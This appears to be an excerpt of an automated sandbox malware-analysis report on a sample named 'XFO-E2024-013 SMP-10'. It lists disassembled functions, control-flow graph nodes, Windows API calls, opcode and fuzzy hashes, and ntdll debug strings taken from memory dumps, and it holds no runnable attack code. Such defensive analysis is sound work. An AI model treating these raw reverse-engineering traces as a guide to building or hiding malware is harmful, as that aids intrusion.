                                                              • Opcode ID: 3c4c82ffe9e2637f9c0b03e17c2ef05438faead3bb8494bc245809be69176afb
                                                              • Instruction ID: 7656ebaa64e068870cd233fd54207e833a46b1e9e0b7fb7ddf8ec8f242163898
                                                              • Opcode Fuzzy Hash: 3c4c82ffe9e2637f9c0b03e17c2ef05438faead3bb8494bc245809be69176afb
                                                              • Instruction Fuzzy Hash: CF01D2B2D4021C7AEB10ABE19CC2DEF7B7CDF40798F408069FA04B7240D6785E068BA5
                                                              Function 00417BDE Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 333 417bde-417bdf 334 417be1-417bf3 333->334 335 417c55-417c67 333->335 339 417c2e-417c38 334->339 337 417c68-417c70 335->337 337->339 340 417c72-417c74 337->340 339->335 341 417c3a-417c3b 339->341 340->337 342 417c76-417c7a 340->342 343 417bca-417bd7 LdrLoadDll 341->343 344 417c3d 341->344 345 417c8c-417c98 342->345 346 417c7c-417c82 342->346 348 417bda-417bdd 343->348 344->335 347 417c99-417cae 345->347 349 417cc0-417cc1 346->349 350 417c84 346->350 352 417cb0 347->352 353 417d17-417d2b call 42b9b3 347->353 350->347 351 417c87 350->351 351->345 354 417cb2-417cbe 352->354 355 417d2e-417d3f 352->355 353->355 354->349
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 192c4f8d791a74f5fc4a3e9ce53003c0e739193646856a7bd5574ecafb04c77f
                                                              • Instruction ID: c5951bf59670ed95c8a229a69371e0f0c9dc29fdd02334928d99ddc3ca0f2906
                                                              • Opcode Fuzzy Hash: 192c4f8d791a74f5fc4a3e9ce53003c0e739193646856a7bd5574ecafb04c77f
                                                              • Instruction Fuzzy Hash: 29219EB67442051FC315CE64EC81BF9B734EB92325F11029AF904CF381E6255D56C7E5
                                                              Function 00417BF8 Relevance: 1.6, APIs: 1, Instructions: 96libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 358 417bf8-417c23 360 417c70 358->360 361 417c25-417c28 358->361 364 417c72-417c74 360->364 365 417c2e-417c38 360->365 362 417be5-417bf3 361->362 363 417c2a 361->363 362->358 366 417bb8-417bc1 363->366 367 417c2c-417c38 363->367 370 417c76-417c7a 364->370 371 417c68-417c6e 364->371 368 417c55-417c67 365->368 369 417c3a-417c3b 365->369 374 417bc3-417bc9 366->374 375 417bda-417bdd 366->375 367->368 367->369 368->371 372 417bca-417bd7 LdrLoadDll 369->372 373 417c3d 369->373 376 417c8c-417c98 370->376 377 417c7c-417c82 370->377 371->360 372->375 373->368 374->372 378 417c99-417cae 376->378 379 417cc0-417cc1 377->379 380 417c84 377->380 382 417cb0 378->382 383 417d17-417d2b call 42b9b3 378->383 380->378 381 417c87 380->381 381->376 384 417cb2-417cbe 382->384 385 417d2e-417d3f 382->385 383->385 384->379
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 05ce74115300aa1d0386c8a992e5465be043cc1f53121675ba303ccf5aa30423
                                                              • Instruction ID: 00ac5599f99533841f8bda13b0be2f1b62a40995406928251777d9fad877b1ce
                                                              • Opcode Fuzzy Hash: 05ce74115300aa1d0386c8a992e5465be043cc1f53121675ba303ccf5aa30423
                                                              • Instruction Fuzzy Hash: CD21AB3A70C10A9FCB118E24D844AEAFF74EF96719B2041DAD450CB342E226A98687D8
                                                              Function 0042CC63 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 404 42cc63-42cca1 call 404643 call 42db53 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041E8EB,?,?,00000000,?,0041E8EB,?,?,?), ref: 0042CC9C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: a629522e6cb8f85e8bdb182f51a111a0892afd8ed588c6852a699a7bde638c1b
                                                              • Instruction ID: 7c74d4e41703ecf2ac74f9d9b4895f51b419b40aa0f09aed774a1cc672b14946
                                                              • Opcode Fuzzy Hash: a629522e6cb8f85e8bdb182f51a111a0892afd8ed588c6852a699a7bde638c1b
                                                              • Instruction Fuzzy Hash: 3DE09AB22042187BCA14EF5AEC41F9B37ACEFC9710F004419FA08A7341D675BA108BB8
                                                              Function 0042CCA3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 409 42cca3-42cce1 call 404643 call 42db53 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,004173E4,000000F4), ref: 0042CCDC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: cdd6b400f2d781c627cbe586a591c7bbeaa857b726842983189184a5aa92914a
                                                              • Instruction ID: 17ffdd14cf893de34d185b730fd02e884b2db9c7d9af60b921a6e04f82d44752
                                                              • Opcode Fuzzy Hash: cdd6b400f2d781c627cbe586a591c7bbeaa857b726842983189184a5aa92914a
                                                              • Instruction Fuzzy Hash: C8E06D712002047BC610EE49DC42F9B37ACEFC5714F004419F908A7341D674B9108AB8
                                                              Function 0042CCE3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 419 42cce3-42cd1f call 404643 call 42db53 ExitProcess
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,9A0A6B39,?,?,9A0A6B39), ref: 0042CD1A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1937882646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_XFO-E2024-013 SMP-10.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              • Opcode ID: ff46c3749a6ab0d7dff1e82a35f795f13fa1c0c29bc4e148dcdef1bc45769d99
                                                              • Instruction ID: db584931667c167d052b57122e12c945e868705e8a3680be29b3f7ccc7343bef
                                                              • Opcode Fuzzy Hash: ff46c3749a6ab0d7dff1e82a35f795f13fa1c0c29bc4e148dcdef1bc45769d99
                                                              • Instruction Fuzzy Hash: 49E04F356442147BC610AA5ADC01F9B775CEBC5754F414419FA0CA7241D675791187E4
                                                              Function 011D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 424 11d2c0a-11d2c0f 425 11d2c1f-11d2c26 LdrInitializeThunk 424->425 426 11d2c11-11d2c18 424->426
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8f82035e04d82463a7105c8909f4a09c4efebd0c05eebf29ae5372b9fc892d6b
                                                              • Instruction ID: 3652bbc4da8800507982ef318becc07e0e2f2a8e6a8340f506c4c6b6bb42b6ed
                                                              • Opcode Fuzzy Hash: 8f82035e04d82463a7105c8909f4a09c4efebd0c05eebf29ae5372b9fc892d6b
                                                              • Instruction Fuzzy Hash: 3FB09B719019C5C5DA1AE7A4470C717794077D0701F25C161D2130641F4738C5D1E275

                                                              Non-executed Functions

                                                              Function 01212349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              • Opcode ID: 039239543201ec0df7667e819a506877b669fb62bdae792084caf091d93c2b53
                                                              • Instruction ID: 83d6360443ec8345c316e0771fc5dd82186b0db1850907c10398d2523098e409
                                                              • Opcode Fuzzy Hash: 039239543201ec0df7667e819a506877b669fb62bdae792084caf091d93c2b53
                                                              • Instruction Fuzzy Hash: 3792AF71624342EFE725DF28C880B6BB7E9BBA4714F24482DFA94D7254D770E844CB92
                                                              Function 011C8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Invalid debug info address of this critical section, xrefs: 012054B6
                                                              • Thread identifier, xrefs: 0120553A
                                                              • Address of the debug info found in the active list., xrefs: 012054AE, 012054FA
                                                              • Critical section address, xrefs: 01205425, 012054BC, 01205534
                                                              • Critical section address., xrefs: 01205502
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012054E2
                                                              • 8, xrefs: 012052E3
                                                              • double initialized or corrupted critical section, xrefs: 01205508
                                                              • undeleted critical section in freed memory, xrefs: 0120542B
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0120540A, 01205496, 01205519
                                                              • corrupted critical section, xrefs: 012054C2
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 012054CE
                                                              • Critical section debug info address, xrefs: 0120541F, 0120552E
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01205543
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              • Opcode ID: 40a21583d13fbe428aa963b794cd1e072a878c53e1370c2a85474fc0f17f6329
                                                              • Instruction ID: 1e87b289c224ad08c630df94fc2761fd3a1880b1604e329c5f74db777f42047e
                                                              • Opcode Fuzzy Hash: 40a21583d13fbe428aa963b794cd1e072a878c53e1370c2a85474fc0f17f6329
                                                              • Instruction Fuzzy Hash: 9A81BFB0A50359EFDB25CF99C849BAEBBB5FB08B14F104219F604B7681D3B1A941CF60
                                                              Function 011C29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0120261F
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01202498
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01202412
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 012024C0
                                                              • @, xrefs: 0120259B
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 012022E4
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01202409
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 012025EB
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01202602
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01202506
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01202624
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                              • API String ID: 0-4009184096
                                                              • Opcode ID: 986758d16aa20656fa13b4eb1d225ac3c6665fc6c1ac646dd42a4fba8844e185
                                                              • Instruction ID: 59ff32427acc9f77df4e58726086cca95c92437659c228d77de32dc98c44d98c
                                                              • Opcode Fuzzy Hash: 986758d16aa20656fa13b4eb1d225ac3c6665fc6c1ac646dd42a4fba8844e185
                                                              • Instruction Fuzzy Hash: 48026FB1D002299FDB35DB54CD84BEAB7B8AB54704F0141EAE709A7282DB709F84CF59
                                                              Function 01238B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                              • API String ID: 0-2515994595
                                                              • Opcode ID: 7bc5b81427f9931214ba5cf24f61f11520132b84bad9ce5025c1a2318e3140ad
                                                              • Instruction ID: b272858696b2fb5aa4f76a63cd7c857f13dd587a2b2d182821adb45198c55e02
                                                              • Opcode Fuzzy Hash: 7bc5b81427f9931214ba5cf24f61f11520132b84bad9ce5025c1a2318e3140ad
                                                              • Instruction Fuzzy Hash: D251C3B11243069BD32DCF288948BABBBECEFD8654F144A1DFA94C7280E770D505C792
                                                              Function 011AAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-3197712848
                                                              • Opcode ID: 5b8346231689190884cd647d9a89d4b35460cc852e167dbf42e118860e2aad1b
                                                              • Instruction ID: 0ab90de89de863f4f1ff96b8d36d60a08dfd9c8c2f41553dd4ef2d2d57956233
                                                              • Opcode Fuzzy Hash: 5b8346231689190884cd647d9a89d4b35460cc852e167dbf42e118860e2aad1b
                                                              • Instruction Fuzzy Hash: 8D12F1756093828FD32DDF28D440BAEBBE4BF84718F85491DFA858B291E734D944CB92
                                                              Function 01240274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              • Opcode ID: 02c7a255fccbd87493022f0ac9ef0fb4530a2636c8a5a7467427e9f70e50b554
                                                              • Instruction ID: f30585403567fdab109d2701a1de962932fcb41e4bed18cb29485f60f35f0e46
                                                              • Opcode Fuzzy Hash: 02c7a255fccbd87493022f0ac9ef0fb4530a2636c8a5a7467427e9f70e50b554
                                                              • Instruction Fuzzy Hash: 69D1FE31920686DFDB2AEF68D441AEDBBF1FF49B14F088049F6469B252D7349980CB58
                                                              Function 012189B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01218A67
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01218A3D
                                                              • HandleTraces, xrefs: 01218C8F
                                                              • AVRF: -*- final list of providers -*- , xrefs: 01218B8F
                                                              • VerifierDebug, xrefs: 01218CA5
                                                              • VerifierFlags, xrefs: 01218C50
                                                              • VerifierDlls, xrefs: 01218CBD
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                              • API String ID: 0-3223716464
                                                              • Opcode ID: c0d9fede24bad09da407349a5cc27e0e194ff2ebbff0dc104cba89e336248c19
                                                              • Instruction ID: 9b5f7185c32b63b5797d8a2c349929518c8856dd743880b1185a167b54bb4f66
                                                              • Opcode Fuzzy Hash: c0d9fede24bad09da407349a5cc27e0e194ff2ebbff0dc104cba89e336248c19
                                                              • Instruction Fuzzy Hash: 8A914772662712EFD725EF68D8C0B6BBBE4BBB4B14F044518FA40AB248D7709D01CB91
                                                              Function 0119EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                              • API String ID: 0-1109411897
                                                              • Opcode ID: 7ef1252d2a3a6fcbf13f9451e7308f01ae4f236dfc4b24998e0ed83b0b510872
                                                              • Instruction ID: d4919334d7b2964110e9ac85d607b5557184f3bf0281d6d32e24626d615ff065
                                                              • Opcode Fuzzy Hash: 7ef1252d2a3a6fcbf13f9451e7308f01ae4f236dfc4b24998e0ed83b0b510872
                                                              • Instruction Fuzzy Hash: 61A24874A0562ACFDF68DF18C8887AEBBB5AF45304F1542E9D91DA7290DB309E81CF41
                                                              Function 011C63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              • Opcode ID: d6aae02cab86c07565c49d23afeb8f1b5c137be76902264ad8c270f5d2116783
                                                              • Instruction ID: 649d046db6c10c601207a894ae2c72f1ea55395f6f19bf38dcf5afd8280a029a
                                                              • Opcode Fuzzy Hash: d6aae02cab86c07565c49d23afeb8f1b5c137be76902264ad8c270f5d2116783
                                                              • Instruction Fuzzy Hash: 91913830B117569FEB2EEF18E848BAEBBA1BB60F14F10421DDA00677C6D7749842C791
                                                              Function 0118645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitShimEngine, xrefs: 011E99F4, 011E9A07, 011E9A30
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 011E9A2A
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 011E9A01
                                                              • apphelp.dll, xrefs: 01186496
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 011E9A11, 011E9A3A
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011E99ED
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              • Opcode ID: 106c4fcf26521cb8cc973f8247ce92191015981f548001db6cbf120a20512f6c
                                                              • Instruction ID: db4a673e2f4630b59dce0414c58f0dc07527da995e01387967f21f254f2b796a
                                                              • Opcode Fuzzy Hash: 106c4fcf26521cb8cc973f8247ce92191015981f548001db6cbf120a20512f6c
                                                              • Instruction Fuzzy Hash: 9C51BE712087049FE72DEF64D849BABB7E8EF84A48F00491DE58597260E730E945CB92
                                                              Function 011C2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01202180
                                                              • RtlGetAssemblyStorageRoot, xrefs: 01202160, 0120219A, 012021BA
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0120219F
                                                              • SXS: %s() passed the empty activation context, xrefs: 01202165
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 012021BF
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01202178
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              • Opcode ID: 7d09c59220557203b5f3565cd28abcc891bfc640b8838e4bf43a362209d57a83
                                                              • Instruction ID: 56425d5894cfe57f0010bf722e7d0c73e20142ea1861bfc366e9e4c9a5c0385e
                                                              • Opcode Fuzzy Hash: 7d09c59220557203b5f3565cd28abcc891bfc640b8838e4bf43a362209d57a83
                                                              • Instruction Fuzzy Hash: 85313B36B50321B7F7168A998C89F6ABA78DB75E50F05015DFB04B7282D3709A00C6A1
                                                              Function 011CC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01208181, 012081F5
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 012081E5
                                                              • LdrpInitializeImportRedirection, xrefs: 01208177, 012081EB
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 011CC6C3
                                                              • Loading import redirection DLL: '%wZ', xrefs: 01208170
                                                              • LdrpInitializeProcess, xrefs: 011CC6C4
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.1938696517.0000000001160000.00000040.00001000.00020000.00000000.sdmp, Offset: 01160000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1160000_XFO-E2024-013 SMP-10.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              • Opcode ID: 2549a71900c8e5733dcf5519446edc5f5ec631e58859f1e25dabd383aa60f5c1
                                                              • Instruction ID: 00a167ab20823ec887ef983d9f87b57e1413764053066c1d08ce4e08a1aafa3e
                                                              • Opcode Fuzzy Hash: 2549a71900c8e5733dcf5519446edc5f5ec631e58859f1e25dabd383aa60f5c1
                                                              • Instruction Fuzzy Hash: 1031E4716543469FD318EB28E985F6B77E4AFA4B14F05065CF944AB391D720EC04C7A3
                                                              Function 011D096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 011D2DF0: LdrInitializeThunk.NTDLL ref: 011D2DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011D0BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011D0BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011D0D60
